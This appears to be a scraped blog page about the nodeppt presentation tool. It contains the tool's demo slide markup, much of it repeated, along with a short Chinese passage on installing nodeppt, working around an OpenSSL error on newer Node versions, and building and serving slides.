    ---

    ### **:fa-users: Users**

    We offer personalized services with deep expertise in design and technology.

    ---

    ### **:fa-graduation-cap: Teams**

    We train teams to help organizations succeed in the digital age.
    :::

    <slide :class="size-50 aligncenter">

    ## Animations

    <slide :class="aligncenter">

    ## Autoplay Animation

    `.animated.lightSpeedIn.slow` {.lightSpeedIn.animated.slow}

    <slide :class="size-50">

    ### **animate.css** + `.build`

    ---

    1. **fadeIn**{.bounce}
    2. **swing**{.swing}
    3. **flash**{.flash}
    4. **pulse**{.pulse}
    5. **shake**{.shake}
    6. **bounceIn**{.bounceIn}
    7. **wobble**{.wobble}
    8. **fadeInLeft**{.fadeInLeft}
    9. **flipInX**{.flipInX}
    10. **tada**{.tada}
    11. **slideInUp**{.slideInUp}
    12. **jello**{.jello}
    13. **heartBeat**{.heartBeat}
    14. **fadeInUp**{.fadeInUp}
    15. **lightSpeedIn**{.lightSpeedIn}
    {.text-cols.build}

    <slide class="bg-black aligncenter" image="https://source.unsplash.com/n9WPPWiPPJw/ .anim">

    ## .background.anim

    <slide :class="size-50 aligncenter">

    ## Content Position

    <slide class="slide-top">
    :::{.content-left}

    ### 1/9 left top

    Put content wherever you want. Have less. Do more. Create beautiful solutions.

    `.slide-top and .content-left`


    <slide class="slide-top">
    :::{.content-center}

    ### 2/9 center top

    In a village of La Mancha, the name of which I have no desire to call to mind,

    `.slide-top and .content-center`

    <slide class="slide-top">
    :::{.content-right}

    ### 3/9 right top

    there lived not long since one of those gentlemen that keep a lance in the lance-rack, an old buckler, a lean hack, and a greyhound for coursing.

    `.slide-top and .content-right`


    <slide>
    :::{.content-left}

    ### 4/9 left top

    An olla of rather more beef than mutton, a salad on most nights, scraps on Saturdays,

    `.content-left`

    <slide>
    :::{.content-center}

    ### 5/9 center top

    lentils on Fridays, and a pigeon or so extra on Sundays, made away with three-quarters of his income.

    `.content-center`

    <slide>
    :::{.content-right}

    ### 6/9 right top

    The rest of it went in a doublet of fine cloth and velvet breeches and shoes to match for holidays,

    `.content-right`


    <slide class="slide-bottom">
    :::{.content-left}

    ### 7/9 left bottom

    while on week-days he made a brave figure in his best homespun.

    `.slide-bottom` and `.content-left`


    <slide class="slide-bottom">
    :::{.content-center}

    ### 8/9 center bottom

    He had in his house a housekeeper past forty, a niece under twenty, and a lad for the field and market-place,

    `.slide-bottom` and `.content-center`

    <slide class="slide-bottom">
    :::{.content-right}

    ### 9/9 right bottom

    who used to saddle the hack as well as handle the bill-hook.

    `.slide-bottom` and `.content-right`

    <slide class="bg-black slide-bottom" image="https://source.unsplash.com/RSOxw9X-suY/">

    :::div {.content-left}
    :fa-tree large:

    ## 1,000,000

    ### We're working to protect up to a million acres of sustainable forest.

    :::


    <slide :class="size-50 aligncenter">

    ## Layout

    <slide :class="size-50">

    ### **What is Stendhal Syndrome?**

    Beauty overdose. `.text-pull-right` {.text-intro}

    Imagine that you are in Florence. If you suddenly start to feel that you literally cannot breathe, you may be experiencing Stendhal Syndrome.

    Psychiatrists have long debated whether it really exists. {.text-pull-right}

    The syndrome is not only associated with viewing a beautiful place, but also good art.

    The beauty of Italian art has a concentrated perfection and transcendent sensuality that is incredibly addictive.


    <slide>

    :::{.aligncenter}

    ### Simple CSS Alignments

    Put content wherever you want.
    :::

    :::footer
    Footer: logo, credits... (.alignleft) {.alignleft}

    [:fa-twitter: @username .alignright](){.alignright}

    :::

    :::header
    Header (logo) :.alignright:{.alignright}
    :::


    <slide :class="size-80 aligncenter">

    ## Prismjs for Code Highlight

    <slide :class="size-80">

    :::column {.vertical-align}

    ### **WebSlides is really easy**

    Each parent `<section>` in the #webslides element is an individual slide. {.text-intro}

    Code is neat, scalable, and well documented. It uses **intuitive markup with popular naming conventions**. There's no need to overuse classes or nesting. **Based on** [SimpleSlides](https://github.com/jennschiffer/SimpleSlides) , by [Jenn Schiffer](http://jennmoney.biz) :)

    ----

    ```html
    <article id="webslides">
    <!-- Slide 1 -->
    <section>
    <h1>Design for trust</h1>
    </section>
    <!-- Slide 2 -->
    <section class="bg-primary">
    <div class="wrap">
    <h2>.wrap = container (width: 90%) with fadein</h2>
    </div>
    </section>
    </article>
    ```

    :::

    ---

    Vertical sliding? `<article id="webslides" class="vertical">` {.aligncenter}


    <slide :class="size-80">

    Optional · 500+ icons {.text-subtitle}

    ## [:fa-flag: Font Awesome](http://fontawesome.io/icons/) as **SVG icons** {.animated.bounceIn}

    ```markdown
    :fa-flag:
    ```


    <slide :class="size-50 aligncenter">

    ## Quote

    <slide class="bg-black-blue" :class="size-60">

    > I have always appreciated designers who dare to reinterpret fabrics and proportions, so I follow the Japanese and Belgian designers.
    > ==Zaha Hadid==
    > {.text-quote}

    <slide image="https://webslides.tv/static/images/satya.png .left-bottom">

    :::div {.content-right}

    > "There is something only a CEO uniquely can do, which is set that tone, which can then capture the soul of the collective."
    > ==Satya Nadella, CEO of Microsoft.==
    > :::


    <slide>
    :::card {.quote}



    ![](https://webslides.tv/static/images/davinci.png)

    ---

    > “WebSlides helped us build a culture of innovation and excellence.”
    > ==Leonardo da Vinci==


    <slide class="aligncenter">

    ## Plugins

    <slide :class="size-60">

    ## echarts {.aligncenter}


    ```echarts {style="height:100%;width:100%;"}
    {
    tooltip: {
    trigger: 'item',
    formatter: "{a} <br/>{b}: {c} ({d}%)"
    },
    legend: {
    orient: 'vertical',
    x: 'left',
    data:['直达','营销广告','搜索引擎','邮件营销','联盟广告','视频广告','百度','谷歌','必应','其他']
    },
    series: [
    {
    name:'访问来源',
    type:'pie',
    selectedMode: 'single',
    radius: [0, '30%'],

    label: {
    normal: {
    position: 'inner'
    }
    },
    labelLine: {
    normal: {
    show: false
    }
    },
    data:[
    {value:335, name:'直达', selected:true},
    {value:679, name:'营销广告'},
    {value:1548, name:'搜索引擎'}
    ]
    },
    {
    name:'访问来源',
    type:'pie',
    radius: ['40%', '55%'],
    label: {
    normal: {
    formatter: '{a|{a}}{abg|}\n{hr|}\n {b|{b}:}{c} {per|{d}%} ',
    backgroundColor: '#eee',
    borderColor: '#aaa',
    borderWidth: 1,
    borderRadius: 4,
    // shadowBlur:3,
    // shadowOffsetX: 2,
    // shadowOffsetY: 2,
    // shadowColor: '#999',
    // padding: [0, 7],
    rich: {
    a: {
    color: '#999',
    lineHeight: 22,
    align: 'center'
    },
    // abg: {
    // backgroundColor: '#333',
    // width: '100%',
    // align: 'right',
    // height: 22,
    // borderRadius: [4, 4, 0, 0]
    // },
    hr: {
    borderColor: '#aaa',
    width: '100%',
    borderWidth: 0.5,
    height: 0
    },
    b: {
    fontSize: 16,
    lineHeight: 33
    },
    per: {
    color: '#eee',
    backgroundColor: '#334455',
    padding: [2, 4],
    borderRadius: 2
    }
    }
    }
    },
    data:[
    {value:335, name:'直达'},
    {value:310, name:'邮件营销'},
    {value:234, name:'联盟广告'},
    {value:135, name:'视频广告'},
    {value:1048, name:'百度'},
    {value:251, name:'谷歌'},
    {value:147, name:'必应'},
    {value:102, name:'其他'}
    ]
    }
    ]
    }

    ```

    <slide class="aligncenter">

    ## Plugins: mermaid

    <slide :class="size-60">

    ## Basic sequence diagram {.aligncenter}


    <pre class="mermaid">sequenceDiagram
    Alice ->> Bob: Hello Bob, how are you?
    Bob-->>John: How about you John?
    Bob--x Alice: I am good thanks!
    Bob-x John: I am good thanks!
    Note right of John: Bob thinks a long<br/>long time, so long<br/>that the text does<br/>not fit on a row.

    Bob-->Alice: Checking with John...
    Alice->John: Yes... John, how are you?</pre>



    <slide :class="size-60">

    ## Message to self in loop {.aligncenter}

    <pre class="mermaid">sequenceDiagram
    participant Alice
    participant Bob
    Alice->>John: Hello John, how are you?
    loop Healthcheck
    John->>John: Fight against hypochondria
    end
    Note right of John: Rational thoughts<br/>prevail...
    John-->>Alice: Great!
    John->>Bob: How about you?
    Bob-->>John: Jolly good!</pre>

    <slide :class="size-80">

    ## Gantt {.aligncenter}


    <pre class="mermaid">gantt
    dateFormat YYYY-MM-DD
    title Adding GANTT diagram functionality to mermaid

    section A section
    Completed task :done, des1, 2014-01-06,2014-01-08
    Active task :active, des2, 2014-01-09, 3d
    Future task : des3, after des2, 5d
    Future task2 : des4, after des3, 5d

    section Critical tasks
    Completed task in the critical line :crit, done, 2014-01-06,24h
    Implement parser and jison :crit, done, after des1, 2d
    Create tests for parser :crit, active, 3d
    Future task in critical line :crit, 5d
    Create tests for renderer :2d
    Add to mermaid :1d

    section Documentation
    Describe gantt syntax :active, a1, after des1, 3d
    Add gantt diagram to demo page :after a1 , 20h
    Add another diagram to demo page :doc1, after a1 , 48h

    section Last section
    Describe gantt syntax :after doc1, 3d
    Add gantt diagram to demo page :20h
    Add another diagram to demo page :48h</pre>

    <slide :class="size-60">

    ## Flowchart support for fontawesome {.aligncenter}

    <pre class="mermaid">graph TD
    B["fa:fa-twitter for peace"]
    B-->C[fa:fa-ban forbidden]
    B-->D(fa:fa-spinner);
    B-->E(A fa:fa-camera-retro perhaps?);</pre>

    <slide class="aligncenter">

    ## Plugins: KaTex

    <slide class="bg-gradient-v" :class="size-60">

    ## KaTex {.aligncenter}

    | equation | description |
    | ------------------------------------------------------------ | ------------------------------------------------------------ |
    | $\nabla \cdot \vec{\mathbf{B}} = 0$ | divergence of $\vec{\mathbf{B}}$ is zero |
    | $\nabla \times \vec{\mathbf{E}}\, +\, \frac1c\, \frac{\partial\vec{\mathbf{B}}}{\partial t} = \vec{\mathbf{0}}$ | curl of $\vec{\mathbf{E}}$ is proportional to the rate of change of $\vec{\mathbf{B}}$ |
    | $\nabla \times \vec{\mathbf{B}} -\, \frac1c\, \frac{\partial\vec{\mathbf{E}}}{\partial t} = \frac{4\pi}{c}\vec{\mathbf{j}} \nabla \cdot \vec{\mathbf{E}} = 4 \pi \rho$ | _wha?_ |



    <slide :class="size-50 aligncenter">

    ## Others

    <slide :class="size-80">

    ::: {.content-left}

    ## Button

    [.button](){.button} [.button.radius](){.button.radius}

    [.button.ghost](){.button.ghost} [:fa-github: svg-icon](){.button}
    :::

    ::: {.content-left}

    ## Avatar

    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-40}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-48}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-56}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-64}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-72}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-80}

    (80, 72, 64, 56, 48, and 40).
    :::

    <slide :class="aligncenter size-50">

    ## List

    ----

    * Niubility!
    * WebSlides
    * Webpack build in
    * Markdown-it
    * Posthtml
    * Prismjs

    <slide :class="size-50">

    ## Table

    | Left-aligned | Center-aligned | Right-aligned |
    | :----------- | :------------: | ------------: |
    | git status | git status | git status |
    | git diff | git diff | git diff |
    | git status | git status | git status |


    <slide class="bg-purple" :class="size-50 aligncenter" image="http://h1.ioliu.cn/bing/SandiaSunrise_ZH-CN11155504388_1920x1080.jpg .dark">

    ## Speaker Mode

    Click **Url + [?mode=speaker](./?mode=speaker){.bg-primary style="font-size:120%"}** to show Speaker Mode.

    <slide class="bg-primary" :class="size-60 frame">

    ## View More Demos? {.text-serif.aligncenter}

    \* \* \* {.text-symbols}

    <nav class="aligncenter">
    * [:fa-th-large: Layout](./layout.html)
    * [:fa-tv: Background](./background.html)
    * [:fa-magic: Animation](./animation.html)
    * [:fa-cube: Component](./component.html)
    * [:fa-youtube: Media](./media.html)
    {.no-list-style}


    </nav>

    <slide class="bg-black-blue aligncenter" image="https://cn.bing.com/az/hprichbg/rb/PragueChristmas_EN-AU8649790921_1920x1080.jpg .dark">

    ## U work so hard, **but** 干不过 write PPTs {.animated.tada}

    快使用 [nodeppt](https://github.com/ksky521/nodeppt) 轻松搞定高大上 PPT<br/> nodeppt 助力你的人生逆袭之路!{.text-into.animated.delay-800.fadeIn}

    [:fa-cloud-download: Github](https://github.com/ksky521/nodeppt){.button.animated.delay-1s.fadeInUp}

    ​编译 index.md 生成静态 HTML 文件:

    nodeppt build test.md

    ​在本地服务器上浏览 index.md

    nodeppt serve test.md
    ]]>
    + 看一看

    耍一耍

    链接 / iframe:

    ​一个 #webslides 就是一个幻灯片对象,一个 <section/> 就是一个幻灯片页面,#section-X 表示第 X 页。

    • 快捷键:
      • Page 翻页: ↑/↓/←/→ Space Home End
      • Fullscreen 全屏: F
      • Overview 大纲: -/+
      • Speaker Note 演讲者笔记: N
      • Grid Background 网格背景: Enter

    写一写

    ​新建一个文件夹,打开命令行,安装 nodeppt

    npm install -g nodeppt

    ​由于这个库有点旧,在新的 nodejs 上运行会报错。需要打开对应的 package.json 修改一下内容:

    webp

    ​在 "scripts":{} 下插入 "serve": "SET NODE_OPTIONS=--openssl-legacy-provider",

    ​之后每次执行 nodeppt 的命令前都必须执行:

    set NODE_OPTIONS=--openssl-legacy-provider

    ​回到文件夹,创建一个 index.md,编写如下内容:

    ​至于 nodeppt 中特有的语法,有时间再慢慢研究吧……

    title: nodeppt - 这可能是迄今为止最好的网页版演示库
    speaker: 三水清
    url: https://github.com/ksky521/nodeppt
    js:
    - https://echarts.cdn.apache.org/zh/asset/theme/infographic.js
    plugins:
    - echarts: {theme: infographic}
    - mermaid: {theme: forest}
    - katex

    <slide class="bg-black-blue aligncenter" image="https://cn.bing.com/az/hprichbg/rb/RainierDawn_EN-AU3730494945_1920x1080.jpg .dark">

    # nodeppt {.text-landing.text-shadow}

    这可能是迄今为止最好的网页版演示库 {.text-intro.animated.fadeInUp.delay-500}

    [:fa-github: Github](https://github.com/ksky521/nodeppt){.button.ghost.animated.flipInX.delay-1200}

    <slide :class="size-30 aligncenter">

    ### Install

    ---

    `npm install -g nodeppt` {.animated.fadeInUp}

    <slide :class="size-40 aligncenter">

    ### Commands

    ---

    ```shell {.animated.fadeInUp}
    # create a new slide with an official template
    $ nodeppt new slide.md

    # create a new slide straight from a github template
    $ nodeppt new slide.md -t username/repo

    # start local sever show slide
    $ nodeppt serve slide.md

    # to build a slide
    $ nodeppt build slide.md
    ```

    <slide class="bg-gradient-r" :class=" size-40 aligncenter" image="https://cn.bing.com/az/hprichbg/rb/WinterLynx_ZH-CN7158207296_1920x1080.jpg .dark">

    ## Demo Contents

    ---

    * Keyboard Shortcuts {.animated.fadeInUp}
    * CSS Syntax {.animated.fadeInUp.delay-400}
    * Background {.animated.fadeInUp.delay-800}
    * Animation {.animated.fadeInUp.delay-1200}
    * Content Position {.animated.fadeInUp.delay-1600}
    * Quotes {.animated.fadeInUp.delay-2s}
    * Plugins\: echarts/mermaid/katex {.animated.fadeInUp.delay-2400}
    * Others\: Button/Table.. {.animated.fadeInUp.delay-2800}
    * Speaker mode.. {.animated.fadeInUp.delay-3200}

    <slide :class="size-60 aligncenter">

    ## Keyboard Shortcuts

    ---

    - Page\: ↑/↓/←/→ Space Home End
    - Fullscreen\: F
    - Overview\: -/+
    - Speaker Note\: N
    - Grid Background\: Enter

    :::note

    ## Note here

    :::
    <slide :class="size-50">

    ## :fa-heart-o: CSS Syntax

    WebSlides is so easy to understand and love. Baseline\: 8. {.text-intro}

    * :Typography\::{.text-label} .text-landing, .text-subtitle, .text-data, .text-intro...
    * :BG Colors\::{.text-label} .bg-primary, .bg-blue,.bg-apple...
    * :BG Images\::{.text-label} .background, .background-center-bottom...
    * :Sizes\::{.text-label} .size-50, .size-40...
    * :Component\::{.text-label} card, flexblock, gallery...
    * :Animation\::{.text-label} autoplay, animate.css...
    {.description}

    <slide :class="size-50 aligncenter">

    ## Text Classes

    <slide class="aligncenter">

    # Landings {.text-landing}

    `.text-landing`

    <slide class="aligncenter">

    # Landings {.text-landing}

    Create a simple web presence. {.text-intro}

    `.text-intro`

    <slide class="aligncenter">

    POWERED BY [#WEBSLIDES](https://twitter.com/search?f=tweets&vertical=default&q=%23WebSlides&src=typd) `.text-subtitle` {.text-subtitle}

    # Landings {.text-landing}

    Create a simple web presence. {.text-intro}

    `.text-intro`

    <slide class="bg-black aligncenter" image="https://cn.bing.com/az/hprichbg/rb/RedAntarctica_EN-AU12197122155_1920x1080.jpg">

    # **Landings** {.text-landing.text-shadow}

    `.text-shadow` {.text-intro}

    <slide class="bg-apple aligncenter">

    ## 4,235,678 {.text-data}

    `.text-data`

    <slide>

    Why WebSlides? .text-content {.text-content}

    ## WebSlides is incredibly easy and versatile. The easiest way to make HTML presentations.

    <slide>

    `.text-cols (2 columns)`

    :::div {.text-cols}

    **Why WebSlides?** There are excellent presentation tools out there. WebSlides is about sharing content, essential features, and clean markup. **Each parent &lt;slide&gt;** in the #webslides element is an individual slide.

    **WebSlides help you build a culture of innovation and excellence**. When you're really passionate about your job, you can change the world. How to manage a design-driven organization? Leadership through usefulness, openness, empathy, and good taste.

    :::

    :::flexblock {.metrics}

    :fa-phone:

    Call us at 555.345.6789

    ----

    :fa-twitter:

    @username

    ----

    :fa-envelope:
    Send us an email
    :::

    <slide :class="size-50 aligncenter">

    ## Backgrounds

    <slide>

    ## Corporate Backgrounds

    :::flexblock {.blink.border}

    ## .bg-primary {..bg-primary}

    \#44d

    ---

    ## .bg-secondary {..bg-secondary}

    \#67d

    ---

    ## .bg-light {..bg-light}

    \#edf2f7

    ---

    ## body

    \#f7f9fb

    :::

    ---

    ## General Colors

    :::flexblock {.blink.border}

    ## .bg-black {..bg-black}

    \#111

    ---

    ## .bg-black-blue {..bg-black-blue}

    \#123

    ---

    ## .bg-white {..bg-white}

    \#fff
    :::

    <slide>

    ## Colorful

    :::flexblock {.border.blink}

    ## .bg-red {..bg-red}

    \#c23

    ---

    ## .bg-green {..bg-green}

    \#077

    ---

    ## .bg-blue {..bg-blue}

    \#346

    ---

    ## .bg-purple {..bg-purple}

    \#62b

    :::

    ---

    ### Transparent Backgrounds

    :::flexblock {.border.blink}

    ## .bg-trans-dark {..bg-trans-dark}

    rgba(0, 0, 0, 0.5)

    ---

    ## .bg-trans-light {..bg-trans-light}

    rgba(255, 255, 255, 0.2)

    :::

    <slide class="bg-gradient-h">

    # Gradients

    :::flexblock {.border}

    Horizontal
    `.bg-gradient-h`

    ---

    Radial
    `.bg-gradient-r`

    ---

    Vertical
    `.bg-gradient-v`
    :::

    <slide class="bg-gradient-v aligncenter">

    ## Vertical Gradient

    `.bg-gradient-v`

    <slide class="bg-gradient-r aligncenter">

    ## Radial Gradient

    `.bg-gradient-r`

    <slide class="bg-black" video="https://webslides.tv/static/videos/working.mp4 poster='https://webslides.tv/static/images/working.jpg'" >

    `.background-video`

    ## **WebSlides is the easiest way to make HTML presentations. Inspire and engage.**

    <slide class="bg-blue aligncenter" video="https://webslides.tv/static/videos/working.mp4 poster='https://webslides.tv/static/images/working.jpg' .dark">

    ## BG Video with Overlay {.text-landing}

    `<slide class="bg-blue aligncenter" video="https://webslides.tv/static/videos/working.mp4 poster='https://webslides.tv/static/images/working.jpg' .dark">` or `.light`

    <slide class="fullscreen bg-blue" youtube=".dark id='_m67JbGjWnc' autoplay loop" :class="aligncenter">

    ## **Youtube Background**

    `<slide youtube=".dark id='_m67JbGjWnc' autoplay loop">`

    <slide image="https://webslides.tv/static/images/iphone-hand.png .right-bottom">

    :::{.content-left}

    ### .background-(position)

    :::flexblock {.specs}
    ::fa-wifi::

    ## Ultra-Fast WiFi

    Simple and secure file sharing.

    ---

    ::fa-battery-full::

    ## All day battery life

    Your battery worries may be over.

    ---

    ::fa-life-ring::

    ## All day battery life

    We'll fix it or if we can't, we'll replace it.

    :::

    <slide :class="size-50 aligncenter">

    ## Components

    <slide :class="size-60">

    ## Shadowbox

    `:::shadowbox`

    ---

    :::shadowbox

    ## We're web people.

    There're excellent presentation tools out there. WebSlides is about telling the story, and sharing it in a beautiful way. Hypertext and clean code as narrative elements.

    ---

    ## Work better, faster.

    Designers, marketers, and journalists can now focus on the content. Simply [choose a demo](https://webslides.tv/demos) and customize it in minutes.

    :::

    <slide :class="size-80">

    :::card

    ## Card

    .card-50.bg-white

    [Unsplash](http://Unsplash.com) is a really cool resource. It is a collection of Creative Commons Zero licensed photos that are really great. {.text-intro}

    - :Role\::{.text-label} Frontend
    - :client\::{.text-label} Acme
    - :year\::{.text-label} 2018
    {.description}

    ---

    ![](https://source.unsplash.com/rCOWMC8qf8A/)

    :::

    <slide class="fullscreen">

    :::card

    ![](https://source.unsplash.com/ALtNa-uKy3M/)

    ---

    ## Bonsai

    Bonsai is a Japanese art form using trees grown in containers — **.fullscreen > .card-50.** {.text-intro}

    Similar practices exist in other cultures, including the Chinese tradition of penjing from which the art originated, and the miniature living landscapes of Vietnamese hòn non bộ.

    :::

    <slide class="aligncenter">

    ## **Flexible blocks**

    `:::flexblock` = Flexible blocks with auto-fill and equal height.

    <slide>

    ## Flexblock

    :::flexblock

    ## :fa-bar-chart: Purpose

    Businesses that people love5

    ---

    ## :fa-bar-chart: Purpose

    Businesses that people love6

    ---

    ## :fa-balance-scale: Purpose

    Businesses that people love7

    ---

    ## :fa-cog: Purpose

    Businesses that people love8

    :::

    ---

    ## Flexblock `{.blink.border}`

    :::flexblock {.blink.border}

    ## :fa-bar-chart: Purpose

    Businesses that people love1

    ---

    ## :fa-bar-chart: Purpose

    Businesses that people love2

    ---

    ## :fa-balance-scale: Purpose

    Businesses that people love3

    ---

    ## :fa-cog: Purpose

    Businesses that people love4

    :::

    <slide>

    ## Flexblock clients

    `{.clients}`

    :::flexblock {.clients}

    ![](https://webslides.tv/static/images/logos/google.svg){.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    ---

    ![](https://webslides.tv/static/images/logos/microsoft.svg) {.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    ---

    ![](https://webslides.tv/static/images/logos/instagram.svg){.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    ---

    ![](https://webslides.tv/static/images/logos/netflix.svg){.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    :::

    <slide :class="size-70">

    ### Gallery

    `:::gallery`

    :::gallery

    ![](https://source.unsplash.com/uPGOEbjbVGA/800x600)

    ## Alicia Jiménez

    Founder & CEO

    ---

    ![](https://source.unsplash.com/6anudmpILw4/800x600)

    ## Sam Trololovitz

    Master of nothing

    ---

    ![](https://source.unsplash.com/IFxjDdqK_0U/800x600)

    ## Erin Gustafson

    VP of Design

    :::

    <slide :class="size-80">

    ### Gallery overlay

    `:::gallery-overlay`

    :::gallery-overlay

    ![](https://source.unsplash.com/uPGOEbjbVGA/800x600)

    ## Alicia Jiménez

    Founder & CEO

    ---

    ![](https://source.unsplash.com/zhkTCCmD4xI/800x600)

    ## Sam Trololovitz

    CTO

    ---

    ![](https://source.unsplash.com/IFxjDdqK_0U/800x600)

    ## Erin Gustafson

    VP of Design

    :::

    <slide class="bg-red frame">

    :::cta

    ::^\$^40::

    ---

    ## Watch TV shows anytime, anywhere

    .frame.bg-red

    :::


    <slide class="bg-black-blue">

    ## Grid Columns

    :::column

    ### **:fa-line-chart: Design**

    Design for growth. We've built a team of world-class designers, developers, and managers.

    ---

    ### **:fa-film: Videos**

    We connect your audience needs, business goals, and brand values into a strategy.

    ---

    ### **:fa-users: Users**

    We offer personalized services with deep expertise in design and technology.

    ---

    ### **:fa-graduation-cap: Teams**

    We train teams to help organizations succeed in the digital age.
    :::

    <slide :class="size-50 aligncenter">

    ## Animations

    <slide :class="aligncenter">

    ## Autoplay Animation

    `.animated.lightSpeedIn.slow` {.lightSpeedIn.animated.slow}

    <slide :class="size-50">

    ### **animate.css** + `.build`

    ---

    1. **fadeIn**{.bounce}
    2. **swing**{.swing}
    3. **flash**{.flash}
    4. **pulse**{.pulse}
    5. **shake**{.shake}
    6. **bounceIn**{.bounceIn}
    7. **wobble**{.wobble}
    8. **fadeInLeft**{.fadeInLeft}
    9. **flipInX**{.flipInX}
    10. **tada**{.tada}
    11. **slideInUp**{.slideInUp}
    12. **jello**{.jello}
    13. **heartBeat**{.heartBeat}
    14. **fadeInUp**{.fadeInUp}
    15. **lightSpeedIn**{.lightSpeedIn}
    {.text-cols.build}

    <slide class="bg-black aligncenter" image="https://source.unsplash.com/n9WPPWiPPJw/ .anim">

    ## .background.anim

    <slide :class="size-50 aligncenter">

    ## Content Position

    <slide class="slide-top">
    :::{.content-left}

    ### 1/9 left top

    Put content wherever you want. Have less. Do more. Create beautiful solutions.

    `.slide-top and .content-left`


    <slide class="slide-top">
    :::{.content-center}

    ### 2/9 center top

    In a village of La Mancha, the name of which I have no desire to call to mind,

    `.slide-top and .content-center`

    <slide class="slide-top">
    :::{.content-right}

    ### 3/9 right top

    there lived not long since one of those gentlemen that keep a lance in the lance-rack, an old buckler, a lean hack, and a greyhound for coursing.

    `.slide-top and .content-right`


    <slide>
    :::{.content-left}

    ### 4/9 left top

    An olla of rather more beef than mutton, a salad on most nights, scraps on Saturdays,

    `.content-left`

    <slide>
    :::{.content-center}

    ### 5/9 center top

    lentils on Fridays, and a pigeon or so extra on Sundays, made away with three-quarters of his income.

    `.content-center`

    <slide>
    :::{.content-right}

    ### 6/9 right top

    The rest of it went in a doublet of fine cloth and velvet breeches and shoes to match for holidays,

    `.content-right`


    <slide class="slide-bottom">
    :::{.content-left}

    ### 7/9 left bottom

    while on week-days he made a brave figure in his best homespun.

    `.slide-bottom` and `.content-left`


    <slide class="slide-bottom">
    :::{.content-center}

    ### 8/9 center bottom

    He had in his house a housekeeper past forty, a niece under twenty, and a lad for the field and market-place,

    `.slide-bottom` and `.content-center`

    <slide class="slide-bottom">
    :::{.content-right}

    ### 9/9 right bottom

    who used to saddle the hack as well as handle the bill-hook.

    `.slide-bottom` and `.content-right`

    <slide class="bg-black slide-bottom" image="https://source.unsplash.com/RSOxw9X-suY/">

    :::div {.content-left}
    :fa-tree large:

    ## 1,000,000

    ### We're working to protect up to a million acres of sustainable forest.

    :::


    <slide :class="size-50 aligncenter">

    ## Layout

    <slide :class="size-50">

    ### **What is Stendhal Syndrome?**

    Beauty overdose. `.text-pull-right` {.text-intro}

    Imagine that you are in Florence. If you suddenly start to feel that you literally cannot breathe, you may be experiencing Stendhal Syndrome.

    Psychiatrists have long debated whether it really exists. {.text-pull-right}

    The syndrome is not only associated with viewing a beautiful place, but also good art.

    The beauty of Italian art has a concentrated perfection and transcendent sensuality that is incredibly addictive.


    <slide>

    :::{.aligncenter}

    ### Simple CSS Alignments

    Put content wherever you want.
    :::

    :::footer
    Footer: logo, credits... (.alignleft) {.alignleft}

    [:fa-twitter: @username .alignright](){.alignright}

    :::

    :::header
    Header (logo) :.alignright:{.alignright}
    :::


    <slide :class="size-80 aligncenter">

    ## Prismjs for Code Highlight

    <slide :class="size-80">

    :::column {.vertical-align}

    ### **WebSlides is really easy**

    Each parent `<section>` in the #webslides element is an individual slide. {.text-intro}

    Code is neat, scalable, and well documented. It uses **intuitive markup with popular naming conventions**. There's no need to overuse classes or nesting. **Based on** [SimpleSlides](https://github.com/jennschiffer/SimpleSlides) , by [Jenn Schiffer](http://jennmoney.biz) :)

    ----

    ```html
    <article id="webslides">
    <!-- Slide 1 -->
    <section>
    <h1>Design for trust</h1>
    </section>
    <!-- Slide 2 -->
    <section class="bg-primary">
    <div class="wrap">
    <h2>.wrap = container (width: 90%) with fadein</h2>
    </div>
    </section>
    </article>
    ```

    :::

    ---

    Vertical sliding? `<article id="webslides" class="vertical">` {.aligncenter}


    <slide :class="size-80">

    Optional · 500+ icons {.text-subtitle}

    ## [:fa-flag: Font Awesome](http://fontawesome.io/icons/) as **SVG icons** {.animated.bounceIn}

    ```markdown
    :fa-flag:
    ```


    <slide :class="size-50 aligncenter">

    ## Quote

    <slide class="bg-black-blue" :class="size-60">

    > I have always appreciated designers who dare to reinterpret fabrics and proportions, so I follow the Japanese and Belgian designers.
    > ==Zaha Hadid==
    > {.text-quote}

    <slide image="https://webslides.tv/static/images/satya.png .left-bottom">

    :::div {.content-right}

    > "There is something only a CEO uniquely can do, which is set that tone, which can then capture the soul of the collective."
    > ==Satya Nadella, CEO of Microsoft.==
    > :::


    <slide>
    :::card {.quote}



    ![](https://webslides.tv/static/images/davinci.png)

    ---

    > “WebSlides helped us build a culture of innovation and excellence.”
    > ==Leonardo da Vinci==


    <slide class="aligncenter">

    ## Plugins

    <slide :class="size-60">

    ## echarts {.aligncenter}


    ```echarts {style="height:100%;width:100%;"}
    {
    tooltip: {
    trigger: 'item',
    formatter: "{a} <br/>{b}: {c} ({d}%)"
    },
    legend: {
    orient: 'vertical',
    x: 'left',
    data:['直达','营销广告','搜索引擎','邮件营销','联盟广告','视频广告','百度','谷歌','必应','其他']
    },
    series: [
    {
    name:'访问来源',
    type:'pie',
    selectedMode: 'single',
    radius: [0, '30%'],

    label: {
    normal: {
    position: 'inner'
    }
    },
    labelLine: {
    normal: {
    show: false
    }
    },
    data:[
    {value:335, name:'直达', selected:true},
    {value:679, name:'营销广告'},
    {value:1548, name:'搜索引擎'}
    ]
    },
    {
    name:'访问来源',
    type:'pie',
    radius: ['40%', '55%'],
    label: {
    normal: {
    formatter: '{a|{a}}{abg|}\n{hr|}\n {b|{b}:}{c} {per|{d}%} ',
    backgroundColor: '#eee',
    borderColor: '#aaa',
    borderWidth: 1,
    borderRadius: 4,
    // shadowBlur:3,
    // shadowOffsetX: 2,
    // shadowOffsetY: 2,
    // shadowColor: '#999',
    // padding: [0, 7],
    rich: {
    a: {
    color: '#999',
    lineHeight: 22,
    align: 'center'
    },
    // abg: {
    // backgroundColor: '#333',
    // width: '100%',
    // align: 'right',
    // height: 22,
    // borderRadius: [4, 4, 0, 0]
    // },
    hr: {
    borderColor: '#aaa',
    width: '100%',
    borderWidth: 0.5,
    height: 0
    },
